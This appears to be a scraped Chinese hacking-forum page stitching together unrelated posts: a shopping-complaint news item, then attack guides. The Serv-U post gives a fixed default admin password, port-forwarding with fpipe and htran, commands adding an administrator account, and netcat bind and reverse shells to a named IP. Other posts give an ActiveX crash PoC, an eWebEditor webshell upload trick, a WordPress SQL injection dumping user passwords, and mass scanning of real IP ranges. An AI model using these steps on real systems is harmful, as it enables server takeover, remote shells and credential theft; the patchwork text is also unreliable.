返回列表 发帖

网上购物成黄金周投诉热点 同比增长71%

昨天下午,市工商局、市消协联合盘点节日投诉举报情况,“十一”黄金周期间,12315、96315两条热线受理互联网服务类投诉同比增长71%。    涉及互联网的投诉成了黄金周期间的一个热点,其中包括网上购物、网络游戏和宽带网络接入投诉等。其中,因拖延送货等问题,京东商城被诉11件;因断网且售后电话无人接听,消费者无法上网,北京数码艾提宽带网络技术有限公司被诉11件。
    “十一”期间,12315共受理有关食品的投诉举报51件,其中,消费者投诉同比减少24%,举报同比减少42%。消费者反映的主要问题是食品变质、有异物、饮料兑奖难等。其中,手机投诉连续多年居高不下,节日期间仍是消费者投诉的焦点。(** 窦红梅)

 

您可能还想看的主题:

京东商城再成投诉热点 主要为拖延送货等问题

非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
2、本话题由:小一发表,本帖发表者小一符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
3、其他单位或个人使用、转载或引用本帖时必须征得发表者小一和本站的同意;
4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
6、本站管理员和版主有权不事先通知发帖者而删除本文。

为SERV-U打造最安全的FTP设置
网上介绍利用serv-u架设ftp的服务器的文章很多,在此就不再介绍,附上chm文档一篇,供大家参考。http://www.wangjun.cn/download/serv-u/Serv-U.chm
下面详细说说webshell+serv-u获取系统最高权限的方法及补救方法。
原理:    serv-u默认监听127.0.0.1:43958,在本机才能连接这个管理端口,serv-u默认管理账号是LocalAdministrator,默认密码是"#l@$ak#.lk;0@P",这个密码是固定的。在目标机器上运行fpipe -v -l 12345 -r 43958 127.0.0.1,然后在你自己的机器,用"serv-u administrator"新建SERVER, 目标IP:12345 User:LocalAdministrator Pass:"#l@$ak#.lk;0@P" 那么目标机器的serv-u就归你管了。
利用的前提:要有目标机器的普通权限的SHELL,不需要能终端或物理控制台登录,只要有个shell,能运行端口数据转发的程序就可以了
如何得到一个shell:sql注射得到webshell或者直接利用动网7.0 sp2以下的上传漏洞上传webshell
具体实施方法:   1.利用得到的webshell上传转向程序fpipe,然后执行fpipe -v -l 12345 -r 43958 127.0.0.1
  2 .在你自己的机器,用"serv-u administrator"新建SERVER,依次填入     ip:目标IP      端口 :12345      User:LocalAdministrator      Pass:"#l@$ak#.lk;0@P"    现在你就可以管理这台服务器的serv-u了,新建一个账号,权限为系统管理员(system administrator),并在"目录访问(Dir access)"选项中给予"执行"权限(execute).
  3. ftp连接,然后执行quote site exec net user iisuser password /add 添加一个用户名为iisuser密码为password的用户,加到管理员组 quote site exec net localgroup administrators iisuser /add,现在就可以连接终端并登录了。 
  当然也可以进行别的操作,例如上传一个nc.exe,在目标机器上得到一个管理员权限的shell,可以正向连接,也可以反向连接。       正向连接:连上ftp以后执行 quote site exec nc.exe -l -p 23 -t -e cmd.exe     这时目标主机就成了一台telnet服务器,你可以telnet上目标服务器的23端口.         反向连接:假设你的IP是202.96.209.168      1.先在自己的机器上运行(你要有一个外部IP):nc -vv -lp 99        2.在目标机器上运行 nc -e cmd.exe 202.96.209.168  99 在你的机器上就会得到一个目标机器的具有管理员权限的shell
  如果对方进行了端口过滤或者设置了防火墙的保护(这种保护不限制反弹连接,如果限制的话就要换别的方法呢),可以用TCP SOCKET转发来实现
打个比方: 我的机器为 A 我要测试的机器为 B[不允许正面连接] 我已经在B上得到呢一个SHELL[只要guest的就行呢]
我们可以这样连上对方的43958 I:我在本地监听二个端口23和56 23是等待B来连接的~ 56是等待我来连接的~
II:B连接我监听的23,同时转发到本地的43958
这样管道就建好呢~对方的防火墙就拿我们没有办法呢~
此时在本地运行SERV-U新建一个SERVER,IP填上本地的127.0.0.1端口为56,用户名LocalAdministrator,密码#l@$ak#.lk;0@P
具体实施方法:   假设你的IP是 202.96.209.168    1.在你自己的机器上运行 htran.exe -listen 23 56       2.此时在本地运行SERV-U新建一个SERVER,IP填上本地的127.0.0.1端口为56,用户名LocalAdministrator,密码#l@$ak#.lk;0@P      3。在目标机器上运行 htran.exe -slave 127.0.0.1 43958 202.96.209.168 23 如果不能在webshell下直接运行,可以写一个asp脚本来执行,内容如下
connect.asp <% Set oScript = Server.CreateObject("WSCRIPT.SHELL") oScript.Run (server.mappath("htran")&" -slave 127.0.0.1 43958 202.96.209.168 23 ") %>
  执行http://目标网址/connect.asp,如果出来一片空白,没提示什么错误,现在你应该可以管理目标服务器的serv-u了
  余下的事情就看您自由发挥了。   htran.exe是一个多线程包转发工具,可以到红盟下载http://www.cnhonker.com/download/releases/Tools/HTran.rar
防止方法:    自己给serv-u打补丁,改变默认端口及管理密码。改密码要修改ServUAdmin.exe,ServUDaemon.exe这两个文件,改端口只要在ServUDaemon.ini文件[GLOBAL]选项中加入LocalSetupPortNo=12345即可
很遗憾,在serv-u的最新版本serv-u 5.2.0.0中依然没有任何改变,默认的管理端口及密码还是原来的


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

PDF Viewer Component ActiveX DoS
Title : PDF Viewer Component ActiveX DoS
Auther : Senator of Pirates
E-Mail : Senator.of.Pirates.team@gmail.com
FaceBook : FaceBook.Com/SenatorofPirates
Software link : http://www.ocxt.com/download/PDFViewerSetup.exe
Date : 05/02/2012
Tested : Windows Xp SP3 EN
eax=00000000 ebx=00000001 ecx=01800990 edx=01800990 esi=10150cd0 edi=000c5f6c
eip=017a7a3e esp=0013c754 ebp=0013c758 iopl=0         nv up ei ng nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210282
017a7a3e c60000          mov     byte ptr [eax],0           ds:0023:00000000=??
0:000> d eax
00000000  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
00000010  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
00000020  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
00000030  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
00000040  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
00000050  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
00000060  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
00000070  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
0:000> d ebx
00000001  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
00000011  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
00000021  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
00000031  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
00000041  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
00000051  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
00000061  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
00000071  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
<object classid='clsid:44A8091F-8F01-43B7-8CF7-4BBA71E61E04' id='target' />
<script language='vbscript'>
targetFile = "C:Program FilesPDFViewerpdfviewer.ocx"
prototype  = "Invoke_Unknown TitlebarText As String"
memberName = "TitlebarText"
progid     = "PDFViewerLib.PDFViewer"
argCount   = 1
arg1=String(2068, "A")
target.TitlebarText = arg1
</script>                    




















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

ASP基础教程AdRotator组件的使用
ASP AdRotator 组件
每当用户进入网站或刷新页面时,ASP AdRotator组件就会创建一个AdRotator对象来显示一幅不同的图片。
语法:  
以下为引用的内容:<%set adrotator=server.createobject("MSWC.AdRotator")adrotator.GetAdvertisement("textfile.txt")%>  
实例  
假设我们有一个文件名为"banners.asp"。它类似于这样:  
以下为引用的内容:<html%><body%><%set adrotator=Server.CreateObject("MSWC.AdRotator")response.write(adrotator.GetAdvertisement("ads.txt"))%></body%></html%> Www_
文件"ads.txt"类似这样:  
以下为引用的内容:*webjxcom.gifhttp://www.webjx.com/Visit Webjx.Com80microsoft.gifhttp://www.microsoft.com/Visit Microsoft20   
"ads.txt"文件中星号下面的代码定义了如何显示这些图像,链接地址,图像的替换文本,在每百次点击中的现实几率。我们可以看到,W3School图片的显示几率是80%,而Microsoft图片的显示几率是20%。  
注释:为了使这些链接在用户点击时可以正常工作,我们需要对文件"ads.txt"进行一点点小小的修改:
以下为引用的内容:REDIRECT banners.asp*webjxcom.gifhttp://www.webjx.com/Visit Webjx.Com80microsoft.gifhttp://www.microsoft.com/Visit Microsoft20  
转向页面会接收到名为url的变量的查询字符串,其中含有供转向的URL。
Chinaz.com
注释:如需规定图像的高度、宽度和边框,我们可以在REDIRECT下面插入这些代码:
以下为引用的内容:REDIRECT banners.aspWIDTH 468 HEIGHT 60 BORDER 0 *webjxcom.gif...... Www^
最后要做的是把这些代码加入文件"banners.asp"中:
以下为引用的内容:
<%url=Request.QueryString("url")If url<>"" then Response.Redirect(url)%><html><body><%set adrotator=Server.CreateObject("MSWC.AdRotator")response.write(adrotator.GetAdvertisement("textfile.txt"))%></body></html>  


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

X-Scan的使用方法
这里使用x-scanner作为介绍对象,原因是x-scanner集成了多种扫描功能于一身,它可以采用多线程方式对指定IP地址段(或独立IP地址)进行安全漏洞扫描,提供了图形界面和命令行两种操作方式,扫描内容包括:标准端口状态及端口banner信息、CGI漏洞、RPC漏洞、SQL-SERVER默认帐户、FTP弱口令,NT主机共享信息、用户信息、组信息、NT主机弱口令用户等。扫描结果保存在/log/目录中,index_*.htm为扫描结果索引文件。对于一些已知的CGI和RPC漏洞,x-scanner给出了相应的漏洞描述、利用程序及解决方案,节省了查找漏洞介绍的时间。
[/quote]
[quote]首先x-scanner包括了两个运行程序:xscann.exe和xscan_gui.exe,这两个程序分别是扫描器的控制台版本和窗口版本,作为初学者可能更容易接受窗口版本的扫描软件,因为毕竟初学者使用最多的还是“应用程序”,无论运行那一个版本,他们的功能都是一样的。首先让我们运行窗口版本看看:窗口分为左右两部分,左面是进行扫描的类型,这包括前面提到的漏洞扫描、端口扫描等基本内容;另一部分是有关扫描范围的设定,xscanner可以支持对多个IP地址的扫描,也就是说使用者可以利用xscanner成批扫描多个IP地址,例如在IP地址范围内输入211.100.8.1-211.100.8.255就会扫描整个C类的255台服务器(如果存在的话),这样黑客可以针对某一个漏洞进行搜索,找到大范围内所有存在某个漏洞的服务器。当然如果只输入一个IP地址,扫描程序将针对单独IP进行扫描。
剩下的端口设定在前面已经介绍过,一般对于网站服务器,这个端口选取80或者8080,对于某些特殊的服务器也许还有特殊的端口号,那需要通过端口扫描进行寻找。多线程扫描是这个扫描器的一大特色,所谓多线程就是说同时在本地系统开辟多个socket连接,在同一时间内扫描多个服务器,这样做的好处是提高了扫描速度,节省时间,根据系统的资源配置高低,线程数字也可以自行设定(设定太高容易造成系统崩溃)。
在图形界面下我们看到了程序连接地址“.xscan.exe”,这实际上就是xscanner的控制台程序,也就是说图形窗口只是将控制台扫描器的有关参数设置做了“傻瓜化”处理,程序运行真正执行的还是控制台程序。因此学习控制台是黑客所必需的,而且使用控制台模式的程序也是真正黑客喜爱的操作方式。
现在我们进行一个简单的cgi漏洞扫描,这次演练是在控制台模式下进行的:xscan 211.100.8.87 -port
这个命令的意思是让xscanner扫描服务器211.100.8.87的开放端口,扫描器不会对65535个端口全部进行扫描(太慢),它只会检测网络上最常用的几百个端口,而且每一个端口对应的网络服务在扫描器中都已经做过定义,从最后返回的结果很容易了解服务器运行了什么网络服务。扫描结果显示如下:
Initialize dynamic library succeed.
Scanning 211.100.8.87 ......
[211.100.8.87]: Scaning port state ...
[211.100.8.87]: Port 21 is listening!!!
[211.100.8.87]: Port 25 is listening!!!
[211.100.8.87]: Port 53 is listening!!!
[211.100.8.87]: Port 79 is listening!!!
[211.100.8.87]: Port 80 is listening!!!
[211.100.8.87]: Port 110 is listening!!!
[211.100.8.87]: Port 3389 is listening!!!
[211.100.8.87]: Port scan completed, found 7.
[211.100.8.87]: All done.
这个结果还会同时在log目录下生成一个html文档,阅读文档可以了解发放的端口对应的服务项目。从结果中看到,这台服务器公开放了七个端口,主要有21端口用于文件传输、80端口用于网页浏览、还有110端口用于pop3电子邮件,如此一来,我们就可以进行有关服务的漏洞扫描了。(关于端口的详细解释会在后续给出)
然后可以使用浏览看看这个服务器到底是做什么的,通过浏览发现原来这是一家报社的电子版面,这样黑客可以继续对服务器进行漏洞扫描查找服务器上是否存在perl漏洞,之后进行进一步进攻。
漏洞扫描的道理和端口扫描基本上类似,例如我们可以通过扫描器查找61.135.50.1到61.135.50.255这255台服务器上所有开放了80端口的服务器上是否存在漏洞,并且找到存在什么漏洞,则可以使用xscan 61.135.50.1-61.135.50.255 -cgi进行扫描,因为结果比较多,通过控制台很难阅读,这个时候xscanner会在log下生成多个html的中文说明,进行阅读这些文档比较方便。
二、扫描器使用问题:
载使用漏洞扫描器的过程中,学习者可能会经常遇到一些问题,这里给出有关问题产生的原因和解决办法。扫描器的使用并不是真正黑客生涯的开始,但它是学习黑客的基础,所以学习者应该多加练习,熟练掌握手中使用的扫描器,了解扫描器的工作原理和问题的解决办法。
1、为什么我找不到扫描器报告的漏洞?
扫描器报告服务器上存在某个存在漏洞的文件,是发送一个GET请求并接收服务器返回值来判断文件是否存在,这个返回值在HTTP的协议中有详细的说明,一般情况下“200”是文件存在,而“404”是没有找到文件,所以造成上面现象的具体原因就暴露出来了。
造成这个问题的原因可能有两种:第一种可能性是您的扫描器版本比较低,扫描器本身存在“千年虫”问题,对于返回的信息扫描器在判断的时候,会错误的以为时间信息2000年x月x日中的200是“文件存在”标志,这样就会造成误报;
另外一种可能性是服务器本身对“文件不存在”返回的头部信息进行了更改,如果GET申请的文件不存在,服务器会自动指向一个“没有找到页面”的文档,所以无论文件是否存在,都不会将“404”返回,而是仍然返回成功信息,这样做是为了迷惑漏洞扫描器,让攻击者不能真正判断究竟那个漏洞存在于服务器上。
这一问题的解决办法也要分情况讨论,一般说来第一种情况比较容易解决,直接升级漏洞扫描器就可以了,对于第二种情况需要使用者对网络比较熟悉,有能力的话可以自己编写一个漏洞扫描器,自己编写的扫描器可以针对返回文件的大小进行判断,这样就可以真正确定文件是否存在,但这种方法对使用者的能力要求较高。
2、我使用的扫描器速度和网络速度有关系嘛?
关系不大。扫描器发送和接收的信息都很小,就算是同时发送上百个GET请求一般的电话上网用户也完全可以做得到,影响扫描器速度的主要因素是服务器的应答速度,这取决于被扫描服务器的系统运行速度。如果使用者希望提高自己的扫描速度,可以使用支持多线程的扫描器,但是因为使用者本地电脑档次问题,也不可能将线程设置到上百个,那样的话会造成本地系统瘫痪,一般使用30个线程左右比较合适。
另外对于很多网络服务器来说,为了防止黑客的扫描行为,可能会在防火墙上设置同一IP的单位时间GET申请数量,这样做目的就是避免黑客的扫描和攻击,所以在提高本地扫描速度之前,应该先确认服务器没有相应的过滤功能之后再使用。
3、扫描器报告给我的漏洞无法利用是什么原因?
确切地说扫描器报告的不是“找到的漏洞”,而是找到了一个可能存在漏洞的文件,各种网络应用程序都可能存在漏洞,但是在更新版本的过程中,老版本的漏洞会被修补上,被扫描器找到的文件应该经过手工操作确认其是否是存在漏洞的版本,这可以通过阅读网络安全网站的“安全公告”获得相应知识。
对于已经修补上漏洞的文件来说,也不代表它一定不再存有漏洞,而只能说在一定程度上没有漏洞了,也许在明天,这个新版本的文件中又会被发现还存在其他漏洞,因此这需要网络安全爱好者时刻关注安全公告。当然如果攻击者或者网络管理员对编程比较熟悉,也可以自己阅读程序并力图自己找到可能的安全隐患,很多世界著名的黑客都是不依靠他人,而是自己寻找漏洞进行攻击的。
4、扫描器版本比较新,然而却从来没有找到过漏洞是什么原因?
有一些扫描器专门设计了“等待时间”,经过设置可以对等待返回信息的时间进行调整,这就是说在“网络连接超时”的情况下,扫描器不会傻傻的一直等待下去。但如果你的网络速度比较慢,有可能造成扫描器没有来得及接收返回信息就被认为“超时”而越了过去继续下面的扫描,这样当然是什么也找不到啦。
如果问题真的如此,可以将等待时间设置的长一些,或者换个ISP拨号连接。
5、扫描器报告服务器没有提供HTTP服务?
网络上大多数HTTP服务器和漏洞扫描器的默认端口都是80,而有少量的HTTP服务器并不是使用80端口提供服务的,在确认服务器的确开通了网站服务的情况下,可以用端口扫描器察看一下对方究竟使用什么端口进行的HTTP服务,网络上常见的端口还有8080和81。
另外这种情况还有一种可能性,也许是使用者对扫描器的参数设置不正确造成的,很多扫描器的功能不仅仅是漏洞扫描,有可能还提供了rpc扫描、ftp默认口令扫描和NT弱口令扫描等多种功能,因此在使用每一款扫描器之前,都应该自己阅读有关的帮助说明,确保问题不是出在自己身上。
6、扫描器使用过程中突然停止响应是为什么?
扫描器停止响应是很正常的,有可能是因为使用者连接的线程过多,本地系统资源不足而造成系统瘫痪、也可能是因为对方服务器的响应比较慢,依次发送出去的请求被同时反送回来而造成信息阻塞、还有可能是服务器安装了比较恶毒的防火墙,一旦察觉有人扫描就发送特殊的数据报回来造成系统瘫痪……
因此扫描器停止响应不能简单的说是为什么,也没有一个比较全面的解决方案,不过一般情况下遇到这种问题,我建议你可以更换其他扫描器、扫描另外一些服务器试试,如果问题还没有解决,就可能是因为扫描器与你所使用的系统不兼容造成的,大多数基于微软视窗的漏洞扫描器都是运行在Windows9X下的,如果是Win2000或者NT也有可能造成扫描器无法正常工作。
7、下载回来的扫描器里面怎么没有可执行文件?
扫描器不一定非要是可执行的exe文件,其他例如perl、cgi脚本语言也可以编写扫描器,因此没有可执行文件的扫描器也许是运行在网络服务器上的,这种扫描器可以被植入到网络上的其它系统中,不需要使用者上网就能够24小时不停的进行大面积地址扫描,并将结果整理、分析,最后通过Email发送到指定的电子信箱中,因此这是一种比较高级的扫描器,初学者不适合使用。
另外注意载下在扫描器的时候注意压缩报文件的扩展名,如果是tar为扩展名,那么这个扫描器是运行在Linux系统下的,这种其它操作平台的扫描器无法在视窗平台下应用,文件格式也和FAT32不一样。
8、扫描器只报告漏洞名称,不报告具体文件怎么办?
只要漏洞被发现,网络安全组织即会为漏洞命名,因此漏洞名称对应的文件在相当广泛的范围内都是统一的,只要知道了漏洞的名称,黑客就可以通过专门的漏洞搜索引擎进行查找,并且学习到与找到漏洞相关的详细信息。这种“漏洞搜索引擎”在网络上非常多,例如我国“绿盟”提供的全中文漏洞搜索引擎就是比较理想的一个。


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

ewebeditor v6.0.0漏洞

<TABLE class="tab-content table-break" cellSpacing=0 cellPadding=0>



put(appCommon.toUploadPic('article/200902181028349.jpg',null,null,1,10,'no'));



ewebeditor v6.0.0版本漏洞



今天和静流聊天,他说ewebeditor出了最新漏洞。于是就是检测一下,这个程序爆漏洞一般都是直接上传的漏洞,不过没错 就是上传漏洞。首先在本地搭建一个ASP环境重命名一个木马名字例如:1.gif.asp这样的就OK了。
那么接下来完美本地搭建一个环境你可以用WEB小工具搭建一个,目的就是让远程上传。
【这里如果上传asp文件的话,使用IIS的话,应该取消asp的解析,使其成为一个可以下载的asp文件,如果解析了,可能就只是解析后的html文件了,Neeao注】
http://127.0.0.1/1.gif.asp
搭建好了,在上传的地方,图片来源是网络,加上网络地址
[/quote]
[quote]然后确定,这里是最关键的一部!
[quote]
这里点了“远程文件自动上传”以后,再提交得到木马地址
[/quote]
[quote]由于官方在图片目录做了限制 导致不能执行ASP脚本而没能拿到WEB权限。
属于安全检测漏洞版本ewebeditor v6.0.0
</TABLE>


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

Wordpress 事件管理扩展插件 SQL Injection
本帖最后由 vini5 于 2011-6-12 22:55 编辑




# SoftwareLink: http://wordpress.org/extend/plugins/events-manager-extended/  
# Version     : 3.1.2  
# Author      : LoocK3D  
# Date        : 11 June  2011  
------------------------------------------------------------------------  
   
[-] Dork            ; inurl:wp-admin/admin.php?page=  
[-] Vulnerable File ; /wp-admin/admin.php?page=people&amp;action=printable&amp;event_id=[SQL]  
[-] Exploit         ; -1+union+select+012concat_ws(user_login0x3auser_pass)UAHCrew4+from+wp_users--  
   
   
   
------------------------------------------------------------------------  
   
# UAHCrew Member : Hackeri-AL - LoocK3D - b4cKd00r ~  
# Deface Archive : http://zone-h.org/archive/notifier=UAH-Crew  
# UAHCrew        : uahcrew@yahoo.com<SCRIPT type=text/_(使用时去掉_)javascript_>
/* <![CDATA[ */
(function(){try{var saijrcl=document.getElementById(__cf_email__);a=l.className;if(a){s=;r=parseInt(a.substr(02)16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j2)16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(sl);}}catch(e){}})();
/* ]]> */
</SCRIPT>  
# LoocK3D        : locked.ks@gmail.com<SCRIPT type=text/_(使用时去掉_)javascript_>
/* <![CDATA[ */
(function(){try{var saijrcl=document.getElementById(__cf_email__);a=l.className;if(a){s=;r=parseInt(a.substr(02)16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j2)16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(sl);}}catch(e){}})();
/* ]]> */
</SCRIPT>  复制代码


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

Django开发框架多个安全漏洞
发布时间: 2011-09-12
影响版本:
Django 1.2.5
Django 1.3 beta 1
Django 1.2.4
Django 1.2.2
Django 1.2
漏洞描述:
Django是一款开放源代码的Web应用框架,由Python写成。
Django存在多个安全漏洞,允许攻击者获得敏感信息,操作数据,进行缓存毒药攻击或进行拒绝服务攻击。
1)当使用缓存后端时django.contrib.sessions中处理会话存在错误,可被利用操作会话信息。要成功个利用漏洞需要已知会话KEY和应用程序允许攻击者使用合法会话KEY储存字典类对象到缓冲中。
2)Django模型系统包括一个字段类型-- URLField --,用于校验提供的值是否为合法URL,如果布尔关键字参数verify_exists为真,会尝试校验提供的URL并解析。默认情况下,底层套接字没有超时设置,攻击者可以利用此漏洞发送特制URL消耗所有服务器内存,造成拒绝服务攻击。
3)当校验提供给"URLField"字段类型的URLs处理重定向应答存在错误,攻击者可以利用此漏洞把重定向应答返回给"file://" URL,可判断服务器上的本地文件是否存在。
4)当生成重定向应答的全路径URL时处理"X-Forwarded-Host" HTTP头存在错误,攻击者可以利用此漏洞进行缓存毒药攻击。
细节参考:
https://www.djangoproject.com/weblog/2011/sep/09/security-releases-issued/
http://secunia.com/advisories/45939/


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

返回列表